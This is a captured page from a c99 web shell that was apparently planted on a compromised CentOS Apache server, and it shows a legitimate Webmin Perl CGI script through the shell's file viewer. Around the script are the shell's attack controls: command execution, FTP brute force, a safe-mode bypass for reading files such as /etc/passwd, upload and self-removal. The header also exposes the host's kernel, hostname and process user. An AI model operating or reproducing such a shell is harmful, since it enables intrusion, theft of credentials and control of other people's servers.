!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/cluster-usermin/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     delete_mod.cgi (3.89 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# delete_mod.cgi
# Delete a module from one or all servers, after asking for confirmation

require './cluster-usermin-lib.pl';
&ReadParse();
@servers = &list_servers();
@hosts = &list_usermin_hosts();
if ($in{'server'} < 0) {
    # Find servers that have the module or theme
    foreach $h (@hosts) {
        foreach $m (@{$h->{'modules'}}, @{$h->{'themes'}}) {
            if ($m->{'dir'} eq $in{'mod'}) {
                local ($s) = grep { $_->{'id'} == $h->{'id'} }
                          @servers;
                push(@got, $s);
                $gotmap{$s} = $h;
                $best = $s if (!$s->{'id'});
                last;
                }
            }
        }
    $s = $best ? $best : $got[0];
    }
else {
    ($s) = grep { $_->{'id'} == $in{'server'} } @servers;
    ($h) = grep { $_->{'id'} == $in{'server'} } @hosts;
    @got = ( $s );
    $gotmap{$s} = $h;
    }
$h = $gotmap{$s};
foreach $m ($in{'type'} eq 'mod' ? @{$h->{'modules'}} : @{$h->{'themes'}}) {
    $info = $m if ($m->{'dir'} eq $in{'mod'});
    }

# Setup error handler for down hosts
sub del_error
{
$del_error_msg = join("", @_);
}
&remote_error_setup(\&del_error);
&remote_foreign_require($s->{'host'}, "usermin", "usermin-lib.pl");

&ui_print_header(undef, $text{'delete_title'}, "");
if ($in{'sure'}) {
    # do the deletion in separate processes
    print "<b>",&text("delete_header_$in{'type'}",
                  $info->{'desc'}),"</b><p>\n";
    $p = 0;
    foreach $g (@got) {
        local ($rh = "READ$p", $wh = "WRITE$p");
        pipe($rh, $wh);
        if (!fork()) {
            close($rh);
            local $h = $gotmap{$g};

            # Check for any dependencies on this host
            foreach $m (@{$h->{'modules'}}) {
                foreach $d (split(/\s+/, $m->{'depends'})) {
                    push(@{$ondeps{$d}}, $m);
                    }
                }
            if ($ondeps{$in{'mod'}}) {
                print $wh &serialise_variable([ 0, &text('delete_edepends', join(", ", map { $_->{'desc'} } @{$ondeps{$in{'mod'}}})) ]);
                exit;
                }

            # Delete the module
            &remote_foreign_require($g->{'host'}, "usermin",
                         "usermin-lib.pl") if ($s ne $g);
            local $desc = &remote_foreign_call($g->{'host'},
                "usermin", "delete_usermin_module", $in{'mod'});
            if ($del_error_msg) {
                print $wh &serialise_variable([ 0, $del_error_msg ]);
                }
            elsif ($desc) {
                print $wh &serialise_variable([ 1, $desc ]);
                }
            else {
                print $wh &serialise_variable([ 0, $text{'delete_egone'} ]);
                }

            # Re-request all modules and themes from the server
            local @newmods = grep { $_->{'dir'} ne $in{'mod'} }
                          @{$h->{'modules'}};
            local @newthemes = grep { $_->{'dir'} ne $in{'mod'} }
                            @{$h->{'themes'}};
            $h->{'modules'} = \@newmods;
            $h->{'themes'} = \@newthemes;
            &save_usermin_host($h);

            close($wh);
            exit;
            }
        close($wh);
        $p++;
        }

    # Read back the results
    $p = 0;
    foreach $g (@got) {
        local $rh = "READ$p";
        local $line = <$rh>;
        local $rv = &unserialise_variable($line);
        close($rh);
        local $d = &server_name($g);

        if (!$rv->[0]) {
            print &text('delete_error', $d, $rv->[1]),"<br>\n";
            }
        else {
            print &text('delete_success', $d, $rv->[1]),"<br>\n";
            }
        $p++;
        }
    print "<p><b>$text{'delete_done'}</b><p>\n";
    }
else {
    # Ask if the user is sure..
    $rroot = &remote_eval($s->{'host'}, "usermin",
                  '&get_usermin_miniserv_config(\%m); $m{"root"}');
    $sz = &remote_foreign_call($s->{'host'}, "usermin", "disk_usage_kb",
                   "$rroot/$in{'mod'}");
    print "<center>\n";
    if ($in{'server'} < 0) {
        print &text("delete_rusure_$in{'type'}",
            "<b>$info->{'desc'}</b>", $sz),"<p>\n";
        }
    else {
        print &text("delete_rusure2_$in{'type'}",
            "<b>$info->{'desc'}</b>", $sz, &server_name($s)),"<p>\n";
        }
    print "<form action=delete_mod.cgi>\n";
    print "<input type=hidden name=mod value=\"$in{'mod'}\">\n";
    print "<input type=hidden name=type value=\"$in{'type'}\">\n";
    print "<input type=hidden name=server value=\"$in{'server'}\">\n";
    print "<input type=hidden name=sure value=1>\n";
    print "<input type=submit value=\"$text{'delete_ok'}\"><br>\n";
    print "</center></form>\n";
    }

&remote_finished();
&ui_print_footer("", $text{'index_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0057 ]--